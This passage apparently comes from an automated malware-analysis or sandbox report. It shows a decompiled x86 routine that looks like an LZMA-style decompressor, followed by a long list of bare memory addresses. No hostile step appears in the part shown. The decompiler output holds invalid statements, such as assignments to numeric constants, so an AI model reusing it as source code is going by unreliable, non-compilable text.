								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                              0x00406bc0
                                                                                              0x00406bc7
                                                                                              0x00406bcd
                                                                                              0x00406bd3
                                                                                              0x00000000
                                                                                              0x00406bd7
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bf9
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c0e
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c59
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c5e
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c76
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406ccd
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd2
                                                                                              0x00406cd6
                                                                                              0x00406cd9
                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cef
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d35
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073dd
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
                                                                                              0x004073f1
                                                                                              0x004073f5
                                                                                              0x004073f5
                                                                                              0x00407413
                                                                                              0x0040741a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040741c
                                                                                              0x0040741c
                                                                                              0x00407420
                                                                                              0x004075cf
                                                                                              0x00000000
                                                                                              0x004075cf
                                                                                              0x0040742c
                                                                                              0x00407433
                                                                                              0x0040743b
                                                                                              0x0040743b
                                                                                              0x0040743b
                                                                                              0x0040743e
                                                                                              0x00407441
                                                                                              0x00407441
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d5f
                                                                                              0x00406d61
                                                                                              0x00406d64
                                                                                              0x00406dd5
                                                                                              0x00406dd8
                                                                                              0x00406ddb
                                                                                              0x00406de2
                                                                                              0x00406dec
                                                                                              0x00000000
                                                                                              0x00406dec
                                                                                              0x00406d66
                                                                                              0x00406d6a
                                                                                              0x00406d6d
                                                                                              0x00406d6f
                                                                                              0x00406d72
                                                                                              0x00406d75
                                                                                              0x00406d77
                                                                                              0x00406d7a
                                                                                              0x00406d7c
                                                                                              0x00406d81
                                                                                              0x00406d84
                                                                                              0x00406d87
                                                                                              0x00406d8b
                                                                                              0x00406d92
                                                                                              0x00406d95
                                                                                              0x00406d9c
                                                                                              0x00406da0
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da8
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406da2
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406d97
                                                                                              0x00406dac
                                                                                              0x00406daf
                                                                                              0x00406dcd
                                                                                              0x00406dcf
                                                                                              0x00000000
                                                                                              0x00406dcf
                                                                                              0x00406db1
                                                                                              0x00406db4
                                                                                              0x00406db7
                                                                                              0x00406dba
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbc
                                                                                              0x00406dbf
                                                                                              0x00406dc2
                                                                                              0x00406dc4
                                                                                              0x00406dc5
                                                                                              0x00406dc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ffe
                                                                                              0x00407002
                                                                                              0x00407020
                                                                                              0x00407023
                                                                                              0x0040702a
                                                                                              0x0040702d
                                                                                              0x00407030
                                                                                              0x00407033
                                                                                              0x00407036
                                                                                              0x00407039
                                                                                              0x0040703b
                                                                                              0x00407042
                                                                                              0x00407043
                                                                                              0x00407045
                                                                                              0x00407048
                                                                                              0x0040704b
                                                                                              0x0040704e
                                                                                              0x0040704e
                                                                                              0x00407053
                                                                                              0x00000000
                                                                                              0x00407053
                                                                                              0x00407004
                                                                                              0x00407007
                                                                                              0x0040700a
                                                                                              0x00407014
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407068
                                                                                              0x0040706c
                                                                                              0x0040708f
                                                                                              0x00407092
                                                                                              0x00407095
                                                                                              0x0040709f
                                                                                              0x0040706e
                                                                                              0x0040706e
                                                                                              0x00407071
                                                                                              0x00407074
                                                                                              0x00407077
                                                                                              0x00407084
                                                                                              0x00407087
                                                                                              0x00407087
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070ab
                                                                                              0x004070af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070b5
                                                                                              0x004070b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070bf
                                                                                              0x004070c1
                                                                                              0x004070c5
                                                                                              0x004070c5
                                                                                              0x004070c8
                                                                                              0x004070cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040711c
                                                                                              0x00407120
                                                                                              0x00407127
                                                                                              0x0040712a
                                                                                              0x0040712d
                                                                                              0x00407137
                                                                                              0x00000000
                                                                                              0x00407137
                                                                                              0x00407122
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407143
                                                                                              0x00407147
                                                                                              0x0040714e
                                                                                              0x00407151
                                                                                              0x00407154
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407149
                                                                                              0x00407157
                                                                                              0x0040715a
                                                                                              0x0040715d
                                                                                              0x0040715d
                                                                                              0x00407160
                                                                                              0x00407163
                                                                                              0x00407166
                                                                                              0x00407166
                                                                                              0x00407169
                                                                                              0x00407170
                                                                                              0x00407175
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407203
                                                                                              0x00407203
                                                                                              0x00407207
                                                                                              0x004075a5
                                                                                              0x00000000
                                                                                              0x004075a5
                                                                                              0x0040720d
                                                                                              0x00407210
                                                                                              0x00407213
                                                                                              0x00407217
                                                                                              0x0040721a
                                                                                              0x00407220
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407222
                                                                                              0x00407225
                                                                                              0x00407228
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406df8
                                                                                              0x00406df8
                                                                                              0x00406dfc
                                                                                              0x00407569
                                                                                              0x00000000
                                                                                              0x00407569
                                                                                              0x00406e02
                                                                                              0x00406e05
                                                                                              0x00406e08
                                                                                              0x00406e0c
                                                                                              0x00406e0f
                                                                                              0x00406e15
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e17
                                                                                              0x00406e1a
                                                                                              0x00406e1d
                                                                                              0x00406e1d
                                                                                              0x00406e20
                                                                                              0x00406e23
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e29
                                                                                              0x00406e2f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406e35
                                                                                              0x00406e35
                                                                                              0x00406e39
                                                                                              0x00406e3c
                                                                                              0x00406e3f
                                                                                              0x00406e42
                                                                                              0x00406e45
                                                                                              0x00406e46
                                                                                              0x00406e49
                                                                                              0x00406e4b
                                                                                              0x00406e51
                                                                                              0x00406e54
                                                                                              0x00406e57
                                                                                              0x00406e5a
                                                                                              0x00406e5d
                                                                                              0x00406e60
                                                                                              0x00406e63
                                                                                              0x00406e7f
                                                                                              0x00406e82
                                                                                              0x00406e85
                                                                                              0x00406e88
                                                                                              0x00406e8f
                                                                                              0x00406e93
                                                                                              0x00406e95
                                                                                              0x00406e99
                                                                                              0x00406e65
                                                                                              0x00406e65
                                                                                              0x00406e69
                                                                                              0x00406e71
                                                                                              0x00406e76
                                                                                              0x00406e78
                                                                                              0x00406e7a
                                                                                              0x00406e7a
                                                                                              0x00406e9c
                                                                                              0x00406ea3
                                                                                              0x00406ea6
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eac
                                                                                              0x00000000
                                                                                              0x00406eb1
                                                                                              0x00406eb1
                                                                                              0x00406eb5
                                                                                              0x00407575
                                                                                              0x00000000
                                                                                              0x00407575
                                                                                              0x00406ebb
                                                                                              0x00406ebe
                                                                                              0x00406ec1
                                                                                              0x00406ec5
                                                                                              0x00406ec8
                                                                                              0x00406ece
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed0
                                                                                              0x00406ed3
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406ed6
                                                                                              0x00406edc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406ede
                                                                                              0x00406ee1
                                                                                              0x00406ee4
                                                                                              0x00406ee7
                                                                                              0x00406eea
                                                                                              0x00406eed
                                                                                              0x00406ef0
                                                                                              0x00406ef3
                                                                                              0x00406ef6
                                                                                              0x00406ef9
                                                                                              0x00406efc
                                                                                              0x00406f14
                                                                                              0x00406f17
                                                                                              0x00406f1a
                                                                                              0x00406f1d
                                                                                              0x00406f1d
                                                                                              0x00406f20
                                                                                              0x00406f24
                                                                                              0x00406f26
                                                                                              0x00406efe
                                                                                              0x00406efe
                                                                                              0x00406f06
                                                                                              0x00406f0b
                                                                                              0x00406f0d
                                                                                              0x00406f0f
                                                                                              0x00406f0f
                                                                                              0x00406f29
                                                                                              0x00406f30
                                                                                              0x00406f33
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00000000
                                                                                              0x00406f35
                                                                                              0x00406f33
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00406f3a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f75
                                                                                              0x00406f75
                                                                                              0x00406f79
                                                                                              0x00407581
                                                                                              0x00000000
                                                                                              0x00407581
                                                                                              0x00406f7f
                                                                                              0x00406f82
                                                                                              0x00406f85
                                                                                              0x00406f89
                                                                                              0x00406f8c
                                                                                              0x00406f92
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x004073cb
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x00407447
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x004075e5
                                                                                              0x004075eb
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000

                                                                                              Memory Dump Source
